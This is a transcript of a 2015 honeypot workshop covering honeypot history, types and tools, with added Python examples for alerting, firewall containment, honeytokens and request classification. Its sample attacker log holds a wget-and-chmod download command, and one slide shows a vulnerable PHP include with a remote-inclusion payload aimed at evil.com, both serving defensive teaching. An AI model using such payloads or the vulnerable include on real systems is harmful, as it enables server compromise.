Dr. Honeypots - Hack.lu 2015 - archive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas.pdf
TRANSCRIPT
![Page 1: Dr. Honeypots - Hack.luarchive.hack.lu/2015/Dr.Honeypots_Worskhop_Hack.lu2015_Rist_Arcas .pdf · Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies - Guillaume Arcas](https://reader033.vdocument.in/reader033/viewer/2022042223/5ec99e3f81fedd21814d896f/html5/thumbnails/1.jpg)
Dr. Honeypots - How I Learned to Stop Worrying and Love My Enemies
Guillaume Arcas and Lukas Rist - October 2015
Agenda

- Introduction
- Technology
- Set-Up
- Customization
- Data Analysis
- Scenarios
who are we?
Lukas Rist

Lukas is a software engineer with Blue Coat Norway, developing the behavioral malware analysis and back-end systems used to create an extensive threat intelligence database. Whenever that is not challenging enough, he delves into the depths of structured languages for cyber threat intelligence representation (sigh), honeypot development and researching ICS/SCADA threats under the umbrella of the Honeynet Project, for which he serves as a director. Feel free to ping me: @glaslos
Guillaume Arcas

Guillaume has worked as a Security & Network Analyst since 1997, primarily - but not only - in the Internet & Banking industries. Guillaume then specialized in Digital Forensics & Incident Response and joined Sekoia as CERT team leader. Guillaume has also been a member of the Honeynet Project's French Chapter since 2010. When not hunting for endangered species hanging around on the Internet, Guillaume likes to read (thrillers, SF, History & Philosophy, in no particular order, as long as it is printed) and walk his dog. He also nourishes a certain nostalgia for the esheep.exe software, hence his Twitter avatar (@y0m).
Everything You Always Wanted to Know About Honeypots But Were Afraid to Ask
A Brief History of Honeypots
1986: A long time ago in a network far, far away...
From Clifford Stoll's account of the 1986 LBL intrusion, The Cuckoo's Egg:

“And so it happened that on my second day at work, Dave wandered into my office, mumbling about a hiccup in the Unix accounting system. Someone must have used a few seconds of computing time without paying for it. The computer's books didn't quite balance; last month's bills of $2,387 showed a 75-cent shortfall. Now, an error of a few thousand dollars is obvious and isn't hard to find. But errors in the pennies column arise from deeply buried problems, so finding these bugs is a natural test for a budding software wizard. Dave said that I ought to think about it.”
The first documented honeytoken: fake "SDI Network" documents planted as bait, and a letter addressed to a secretary who did not exist.

"Hey Mike, remember those carrots I left out for bait in January?"
"You mean those SDI files you concocted?"
"Yeah," I said. "Well, my dear, sweet, nonexistent secretary just received a letter."
“Pengo, with his contacts to hackers across Germany, knew how to use Hess's information. Carrying Hess's printouts, one of the Berlin hackers crossed into East Berlin and met with agents from the Soviet KGB.
The deal was made: around 30,000 Deutschmarks—$18,000— for printouts and passwords.
The KGB wasn't just paying for printouts, though. Hess and company apparently sold their techniques as well: how to break into Vax computers; which networks to use when crossing the Atlantic; details on how the Milnet operates.
Even more important to the KGB was obtaining research data about Western technology, including integrated circuit design, computer-aided manufacturing, and, especially, operating system software that was under U.S. export control. They offered 250,000 Deutschmarks for copies of Digital Equipment's VMS operating system.”
1991
Honeypot.sh
1999
The Honeynet Project
The Honeynet Project is a leading international 501(c)(3) non-profit security research organization, dedicated to investigating the latest attacks and developing open source security tools to improve Internet security. With Chapters around the world, our volunteers have contributed to the fight against malware (such as Conficker), discovering new attacks and creating security tools used by businesses and government agencies all over the world.
The organization continues to be on the cutting edge of security research by working to analyze the latest attacks and educating the public about threats to information systems across the world.
Our mission reads "to learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned", with three main pillars:
- Research
- Awareness
- Tools
http://www.honeynet.org/about
What is a Honeypot?
Honeynet Project Definition (2002)
"A honeypot is a single system connected to an existing production network in order to lure attackers."
Honeynet Project Definition (2004)
"A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource."
ENISA Definition (2012)
"A honeypot is a computing resource whose sole task is to be probed, attacked, compromised, used or accessed in any other unauthorized way. The resource can be of any type: a service, an application, a system or a set of systems or simply just a piece of information or data."
Where?
On the Internet:
- it will generate and collect a lot of noise and often useless information;
- it can be seen as a metric of the threat level from the North of the Wall;
- it can help convince top management not to decrease the IT Security budget.
On the internal network:
- if something happens there, sh*t has hit the fan!
- Early Detection System for CERT/DFIR teams;
- if something happens there, there is no need to argue and no time to lose: you are in trouble and need to investigate.
https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots
Taxonomy
Type of attacked resource
- Server-side honeypot
- Client-side honeypot (honeyclient)
Level of interaction
- high-interaction: real system
- low-interaction: emulated system
- hybrid: mix of low & high

The trade-off: a real system shows you everything the intruder does but can be turned against others, while an emulation is safe and cheap to run at scale but easier for the intruder to recognise.
http://www.mcs.vuw.ac.nz/comp/Publications/archive/CS-TR-06/CS-TR-06-12.pdf
https://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots
Why?
Early Awareness & Detection System with Reduced False Positives
In a production environment, some things may be suspicious.
Someone successfully connects to a server at an unusual time from India:
- it can be your newly appointed offshore IT management service provider performing usual tasks;
- it can be a SysAdmin connecting from his/her vacation place because of an emergency.
… Or some Chinese hacker from the PLA Unit 61398
In a honeypot or a honeynet environment, everything is suspicious by nature.
Someone successfully connects to a honeypot from anywhere at any time:
- it can be an intruder performing lateral movements;
- it can be an insider or a too curious authorized user;
- it can be your internal Red Team.
… Or some Chinese hacker from the PLA Unit 61398
In a production environment, you cannot monitor/log/store everything:
- cost & storage constraints
- legal constraints
In a honeypot or honeynet, you must and can monitor/log/store everything:
- network traffic
- uploaded files
- system logs
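Added example (not from the workshop slides or from Kippo itself) of the point made above: on a production host a login at an odd hour is ambiguous, on an internal honeypot every login is an incident, so the only triage left is "who". The script turns honeypot log lines into one alert per source and tags the sources you expect (your Red Team, a vulnerability scanner). The log lines are constructed in a Kippo-like text format; hosts, timestamps, credentials and the known-source list are made up.

```python
"""Alerting on an internal SSH honeypot: every login attempt is an event,
the severity only depends on who the source is and what they did."""
import re
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network

# Constructed sample, Kippo-like layout (assumption: the real format varies by version).
SAMPLE_LOG = """\
2015-10-20 02:14:03+0200 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 10.20.5.77:51234 (10.66.0.10:22) [session: 1]
2015-10-20 02:14:04+0200 [SSHService ssh-userauth on HoneyPotTransport,1,10.20.5.77] login attempt [root/root] failed
2015-10-20 02:14:05+0200 [SSHService ssh-userauth on HoneyPotTransport,1,10.20.5.77] login attempt [root/toor] failed
2015-10-20 02:14:06+0200 [SSHService ssh-userauth on HoneyPotTransport,1,10.20.5.77] login attempt [root/123456] succeeded
2015-10-20 02:14:09+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,10.20.5.77] CMD: wget http://198.51.100.9/x.sh
2015-10-20 02:14:10+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,10.20.5.77] CMD: chmod +x x.sh
2015-10-20 09:30:12+0200 [SSHService ssh-userauth on HoneyPotTransport,2,10.99.1.4] login attempt [admin/admin] failed
"""

# Sources allowed to poke the honeypot (assumption: the Red Team's jump network).
KNOWN_SOURCES = {"10.99.1.0/24": "red-team"}

LOGIN_RE = re.compile(
    r"HoneyPotTransport,(?P<sess>\d+),(?P<src>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)")
CMD_RE = re.compile(r"HoneyPotTransport,(?P<sess>\d+),(?P<src>[\d.]+)\] CMD: (?P<cmd>.*)$")


@dataclass
class Alert:
    source: str
    tag: str = "unknown"
    failed: int = 0
    succeeded: list = field(default_factory=list)   # (user, password) pairs that got in
    commands: list = field(default_factory=list)    # what they typed once inside

    @property
    def severity(self) -> str:
        if self.tag != "unknown":
            return "info"      # expected visitor; still recorded, never silently dropped
        if self.succeeded or self.commands:
            return "high"      # someone is inside a box nobody should ever touch
        return "medium"        # probing or brute force from an unknown host


def tag_source(src: str) -> str:
    addr = ip_address(src)
    for net, tag in KNOWN_SOURCES.items():
        if addr in ip_network(net):
            return tag
    return "unknown"


def build_alerts(log_text: str) -> list:
    """One Alert per source address, in first-seen order."""
    alerts = {}
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line) or CMD_RE.search(line)
        if not m:
            continue                      # connection/banner lines carry no verdict
        src = m.group("src")
        alert = alerts.setdefault(src, Alert(src, tag_source(src)))
        if "result" in m.groupdict():     # a login line
            if m.group("result") == "succeeded":
                alert.succeeded.append((m.group("user"), m.group("pw")))
            else:
                alert.failed += 1
        else:                             # a command line
            alert.commands.append(m.group("cmd"))
    return list(alerts.values())


if __name__ == "__main__":
    for a in build_alerts(SAMPLE_LOG):
        print(f"[{a.severity.upper():6}] {a.source} ({a.tag}): {a.failed} failed, "
              f"{len(a.succeeded)} succeeded, {len(a.commands)} commands")
```

Note that the known-source list lowers severity but never suppresses the alert: an address from the Red Team range showing up when no exercise is scheduled is exactly the kind of thing an intruder who stole a Red Team box would produce.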
Honeypots & the Intrusion Kill Chain
A honeypot can drastically help in detecting the adversary's Reconnaissance actions.
Counter-OSINT:
- A fake LinkedIn profile, Facebook page or email addresses published on the corporate website (they can be hidden in HTML comments so that usual visitors do not see them), fake "leaked credentials" on pastebin, fake DB dumps posted on underground forums, etc. can increase visibility on how the attacker found his/her targets.
- A fake password hash loaded in memory to detect the use of password stealers like Mimikatz.
How?
Critical points
- Monitor/Collect/Store Data
- Allow/Forbid/Restrict access to the Internet
Collecting Data
- You'll have to answer this question: "How can I monitor an intruder with privileged access (root/administrator/system rights) without being detected or defeated?"
Internet Access
- What kind of Internet access will you grant from the honeypot? If Internet access is too limited, the intruder will find no interest in staying any longer; if it is too open, the honeypot becomes a launch pad against third parties.
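One way to settle the Allow/Forbid/Restrict question, as an added example that is not from the workshop slides or from any honeypot project: the gateway-side rules for a high-interaction honeypot, built as iptables argument lists so they can be reviewed before anything is applied. The intruder gets a small budget of new outbound connections (enough to fetch tools and stay interested), no path into the real internal network, no outbound mail, and everything is logged. Interface name, addresses, internal ranges and the budget are assumptions to adapt.

```python
"""Data control for a high-interaction honeypot behind a Linux gateway."""
import shlex
import subprocess


def data_control_rules(hp_if="eth1", hp_ip="10.66.0.10",
                       internal_nets=("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"),
                       new_per_hour=20, burst=5):
    """Ordered FORWARD-chain rules for one honeypot (all values are assumptions)."""
    frm = ["-i", hp_if, "-s", hp_ip]   # packets the honeypot sends
    to = ["-o", hp_if, "-d", hp_ip]    # packets the honeypot receives
    rules = []
    # 1. Data capture first: in a honeynet you log everything, before any verdict.
    rules.append(["-A", "FORWARD", *frm, "-j", "LOG", "--log-prefix", "HP-OUT: "])
    rules.append(["-A", "FORWARD", *to, "-j", "LOG", "--log-prefix", "HP-IN: "])
    # 2. Inbound: everything towards the honeypot is accepted; being attacked is its job.
    rules.append(["-A", "FORWARD", *to, "-j", "ACCEPT"])
    # 3. Packets on sessions that already exist (the intruder's shell, downloads that
    #    passed the budget below) are accepted.
    rules.append(["-A", "FORWARD", *frm, "-m", "conntrack",
                  "--ctstate", "ESTABLISHED,RELATED", "-j", "ACCEPT"])
    # 4. New connections from the honeypot into the real internal network: never.
    for net in internal_nets:
        rules.append(["-A", "FORWARD", *frm, "-d", net, "-j", "DROP"])
    # 5. No outbound mail: spam relaying is the classic abuse of an owned box.
    rules.append(["-A", "FORWARD", *frm, "-p", "tcp", "--dport", "25", "-j", "DROP"])
    # 6. A budget of new outbound TCP connections and DNS queries; beyond it, log and
    #    drop so the honeypot cannot be used to scan or flood third parties.
    budget = ["-m", "limit", "--limit", f"{new_per_hour}/hour", "--limit-burst", str(burst)]
    rules.append(["-A", "FORWARD", *frm, "-p", "tcp", "--syn", *budget, "-j", "ACCEPT"])
    rules.append(["-A", "FORWARD", *frm, "-p", "udp", "--dport", "53", *budget, "-j", "ACCEPT"])
    rules.append(["-A", "FORWARD", *frm, "-p", "tcp", "--syn",
                  "-j", "LOG", "--log-prefix", "HP-LIMIT: "])
    # 7. Everything else the honeypot originates is dropped.
    rules.append(["-A", "FORWARD", *frm, "-j", "DROP"])
    return rules


def render(rules):
    """Shell-quoted iptables commands, for review or for a run script."""
    return ["iptables " + shlex.join(r) for r in rules]


def apply_rules(rules, dry_run=True):
    """Return the commands; with dry_run=False also execute them (needs root)."""
    cmds = render(rules)
    if not dry_run:
        for r in rules:
            subprocess.run(["iptables", *r], check=True)
    return cmds


if __name__ == "__main__":
    print("\n".join(apply_rules(data_control_rules())))
```

Rule order is the whole point: replies to existing sessions pass before the internal-network drop, so an internal host that probes the honeypot still gets its answers, while the honeypot can never open a new connection inwards. Logging every packet through the kernel log is the simplest form of capture; a real deployment records full pcap on the gateway as well, and the HP-LIMIT entries are the ones worth alerting on, since they mean the intruder started using the box.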
Avoid Detection
Skills
What skills do you need?
- Network Forensics
- System Forensics
- Reverse Engineering
- Data Analysis
- Coding
Honeypots Arsenal
High-Interaction Server-Side Honeypots
- Argos
- HiHAT
- SSH: Bifrozt, DockPot, HonSSH
Low-Interaction Server-Side Honeypots
- General purpose: Dionaea, Honeyd, Honeytrap
- Web Application: Glastopf, Google Hack Honeypot
- SSH: Kippo
- SCADA: Conpot
- VoIP: Artemisa
- Sinkholes: HoneySink
- USB: Ghost USB honeypot
High-Interaction Client-Side Honeypots
- Shelia
- Capture-HPC NG

Low-Interaction Client-Side Honeypots
- Thug
- PhoneyC
Hybrid Honeypots
- HoneySpider
- SURFcert IDS
- SSH: Bifrozt
Honeytokens
- a honeytoken is a piece of data that should not be accessed through normal activity, i.e. it does not have any production value; any access must be intentional, which means it is likely to be an unauthorised act. (ENISA)
- http://www1.cs.columbia.edu/~angelos/Papers/2009/DecoyDocumentsSECCOM09.pdf
- http://seclists.org/focus-ids/2003/Feb/95
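Added example, not from the workshop slides, serving both the Counter-OSINT slide (decoy addresses hidden in HTML comments, fake "leaked credentials" on paste sites) and the honeytoken definition above: minting tokens that can be traced back to where they were planted. Each token is derived with an HMAC from a secret and a placement label, so an address that later receives mail, or a credential that later shows up in a honeypot login attempt, tells you which bait the attacker picked up, and nobody without the secret can craft a token that identifies as one of yours. Secret, placements, names and the corp.example domain are assumptions.

```python
"""Traceable honeytokens: decoy e-mail addresses and fake leaked credentials."""
import base64
import hashlib
import hmac

# Where bait has been planted (assumption).  This list is the only state needed;
# the tokens themselves carry no database reference.
PLACEMENTS = [
    "website-html-comment-2015-10",
    "pastebin-fake-leak-2015-10",
    "forum-fake-dbdump-2015-09",
]
FIRST = ["anna", "david", "julie", "marc", "sofia", "thomas"]   # assumed name pool
LAST = ["bauer", "dupont", "larsen", "meyer", "rossi", "weber"]


def _derive(secret: bytes, placement: str, purpose: str) -> bytes:
    """32 pseudo-random bytes bound to (secret, placement, purpose)."""
    return hmac.new(secret, f"{purpose}|{placement}".encode(), hashlib.sha256).digest()


def mint_email(secret: bytes, placement: str, domain: str = "corp.example") -> str:
    """A plausible address; the trailing letters are an HMAC tag, not a sequence number."""
    d = _derive(secret, placement, "email")
    tag = base64.b32encode(d[2:5]).decode().lower().rstrip("=")     # 5 chars of a-z2-7
    return f"{FIRST[d[0] % len(FIRST)]}.{LAST[d[1] % len(LAST)]}{tag}@{domain}"


def mint_credential(secret: bytes, placement: str) -> tuple:
    """(username, password) for a fake leak; the password carries the HMAC tag."""
    d = _derive(secret, placement, "cred")
    user = FIRST[d[0] % len(FIRST)][0] + LAST[d[1] % len(LAST)]     # e.g. "mrossi"
    password = base64.b64encode(d[2:11]).decode()                     # 12 chars
    return user, password


def identify(secret: bytes, observed: str, placements=PLACEMENTS):
    """Map an observed address or 'user:password' back to its placement, or None.

    Usernames alone are deliberately not matched: they are short and guessable.
    The password (or the address tag) is the part only the secret holder could
    have produced, and the comparison is constant-time."""
    for p in placements:
        user, password = mint_credential(secret, p)
        for candidate in (mint_email(secret, p), f"{user}:{password}"):
            if hmac.compare_digest(candidate.encode(), observed.encode()):
                return p
    return None


if __name__ == "__main__":
    secret = b"rotate-me-and-keep-me-out-of-git"      # assumption
    for p in PLACEMENTS:
        print(p, "->", mint_email(secret, p), mint_credential(secret, p))
    # Later a honeypot logs 'login attempt [<user>/<password>]': which bait was it?
    u, pw = mint_credential(secret, "pastebin-fake-leak-2015-10")
    print("seen in honeypot:", f"{u}:{pw}", "->", identify(secret, f"{u}:{pw}"))
```

Because derivation is deterministic, re-minting a placement gives the same bait, so the planting step can be re-run without bookkeeping; rotating the secret invalidates every token at once, which is what you want after the scheme itself leaks.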
“OTS” (off-the-shelf) Honeypots
- http://www.honeynet.org/project
First steps with a honeypot
Let’s play with Kippo!
Kippo

Kippo is a low-interaction server honeypot emulating the Secure Shell (SSH) service. It stores information about brute-force login attacks against the service, the SSH sessions, and the actions the attacker launched against the server.
Kippo

According to ENISA:
“Kippo is extremely useful because, in addition to the detection of simple brute-force attacks against SSH, it also allows you to gather data from terminal session activity of an attacker in the emulated environment and to catch files downloaded by the attacker.”
https://github.com/desaster/kippo
Kippo
- Install Kippo: https://github.com/desaster/kippo/
- Connect to Kippo as an attacker.
- How can you detect you’re not on a real system?
- How can you increase Kippo's stealth?
Kippo
Kippo uses predefined credentials, a fixed password for the “root” user.
- Change that logic and make Kippo accept a connection after X trials.
- What can possibly go wrong?
- How to fix that?
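One way to implement the accept-after-X behaviour, written as an added Python example (not Kippo's code; the class, its method names and the sample source addresses are constructed). A naive counter that accepts whatever the Xth password is would accept a password it rejected a moment earlier, and would also let later reconnects succeed with any password, which no real sshd does; this version remembers, per source and user, which passwords failed and which one "worked", so the emulated host stays consistent.

```python
from collections import defaultdict


class LoginPolicy:
    """Credential policy for an SSH honeypot (added example, not Kippo's code).

    Accepts a fixed password if one is configured (like Kippo's default
    "root" credential), otherwise accepts the attempt once a source has
    tried `accept_after` passwords for that user. Once a password has been
    rejected it keeps being rejected, and once one has been accepted only
    that password keeps working for that source, so an attacker who
    retries or reconnects sees the behaviour of a real server."""

    def __init__(self, accept_after=3, static=None):
        self.accept_after = accept_after
        self.static = dict(static or {})     # user -> always-valid password
        self.attempts = defaultdict(int)     # (src_ip, user) -> attempts seen
        self.accepted = {}                   # (src_ip, user) -> password that "worked"
        self.rejected = defaultdict(set)     # (src_ip, user) -> passwords that failed

    def check(self, src_ip, user, password):
        """Return True if the honeypot should let this login succeed."""
        key = (src_ip, user)
        self.attempts[key] += 1
        if self.static.get(user) == password:
            self.accepted.setdefault(key, password)
            return True
        if key in self.accepted:             # already "logged in" once from here
            return password == self.accepted[key]
        if password in self.rejected[key]:   # never flip-flop on the same password
            return False
        if self.attempts[key] >= self.accept_after:
            self.accepted[key] = password    # remember what we pretended was valid
            return True
        self.rejected[key].add(password)
        return False


if __name__ == "__main__":
    policy = LoginPolicy(accept_after=3)
    # Constructed attempts from an RFC 5737 documentation address.
    for pw in ("toor", "admin", "toor", "qwerty", "qwerty", "toor"):
        print(pw, "->", policy.check("198.51.100.7", "root", pw))
```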
Introduction
- Why you should be here
- Goal of this training
- Hands-on definition
- What are we not doing
Introduction: Why you should be here
Honeypots complement a security posture
Any kind of non-destructive intel is valuable
Wide range of data quality and type
I build honeypots
Introduction: Goal of this training
Understand the value of honeypots
Familiarize with the usage of honeypots
Get a glimpse at honeypot development
Introduction: Hands-on definition
You will run a honeypot
Set-up and customization
Look at and create some data
Introduction: What are we not doing
Install and run a honeypot. What?!
Up to you and the time we have...
Concepts
- Honeypot Events
- Attribution
Concepts: Honeypot Events
Potentially malicious
Lots of noise
Various sources
Take everything with a grain of salt
Concepts: Attribution
It’s a fun game, please play it
The more data the better
What do you get from it?
Technology
- Glastopf
- Let’s build a honeypot
- Grades of interaction
- Conpot
Technology: Glastopf
Web Application Honeypot
Attracting the adversary
Vulnerability Type Emulation
A Honeypot in 20 minutes
https://gist.github.com/glaslos/ac8c32e90ba33e01624e
Technology: Let’s build a honeypot
1. Get a domain
2. Handle requests
3. ??? = $$$
Technology: Grades of interaction
Let’s emulate a vulnerability:
include( $_GET['NAME'] . '.php' );
?NAME=http://evil.com/bot
* Abusing search engines…
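How a low-interaction web honeypot turns that request into an event, as an added Python example (not Glastopf's code; `classify_request`, `emulate_include` and the optional `fetch` callable are assumed names). The honeypot never performs the include; it records which parameter carried a remote URL and answers as the vulnerable page would appear to, optionally downloading the referenced file for later analysis.

```python
from urllib.parse import urlsplit, parse_qsl

# Schemes a PHP include() with allow_url_include enabled would fetch from the
# network; a query parameter carrying one of these is a remote file inclusion
# (RFI) attempt against the emulated page.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def classify_request(request_line):
    """Turn a raw request line such as
    'GET /index.php?NAME=http://evil.com/bot HTTP/1.1' into a honeypot event:
    an RFI attempt (with the parameter and URL used) or an unclassified
    request that is only logged."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for name, value in params:
        if urlsplit(value).scheme.lower() in REMOTE_SCHEMES:
            return {"type": "rfi", "path": parts.path, "param": name, "url": value}
    return {"type": "unknown", "path": parts.path, "params": params}


def emulate_include(event, fetch=None):
    """Answer an RFI event the way include($_GET['NAME'] . '.php') would
    appear to, without executing anything. `fetch` (assumed, optional) is a
    callable that downloads the referenced file so it can be stored for
    analysis; with no fetcher the honeypot simply claims success."""
    if event["type"] != "rfi":
        return 404, "Not Found"
    wanted = event["url"] + ".php"   # the vulnerable code appends '.php'
    if fetch is None:
        return 200, ""
    sample = fetch(wanted)           # bytes handed to the capture pipeline
    return 200, f"captured {len(sample)} bytes from {wanted}"


if __name__ == "__main__":
    # Constructed request, mirroring the ?NAME=http://evil.com/bot example.
    ev = classify_request("GET /index.php?NAME=http://evil.com/bot HTTP/1.1")
    print(ev)
    print(emulate_include(ev, fetch=lambda url: b"<?php ?>"))
```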
Technology: Glastopf, attracting the adversary
How do they find us?
Google Dorks
Crafting the bait
Technology: Conpot
SCADA/ICS Honeypot
Methods of deployment
Get complex
Set-Up
- This is a Honeypot!
- Fingerprinting
- Hands-on
Customization
- Why do you want to?
- Basic concepts of deception
- Who do you want to catch?
Data Analysis
- What is an event?
- Event reporting
- What do we see?
- What are we not seeing?
- Can we attribute?
Scenarios
- Let’s “attack” a honeypot
- How to abuse a honeypot
Summary
- Honeypots
- Development
- Deployment
- Usage
Sneak Peek: Snare
- Yet Another Web App Honeypot
- Focus on attack surface
- Central vulnerability emulation
- Honeypot as a Service
Thanks!
github.com/mushorg
@glaslos - Lukas
@y0m - Guillaume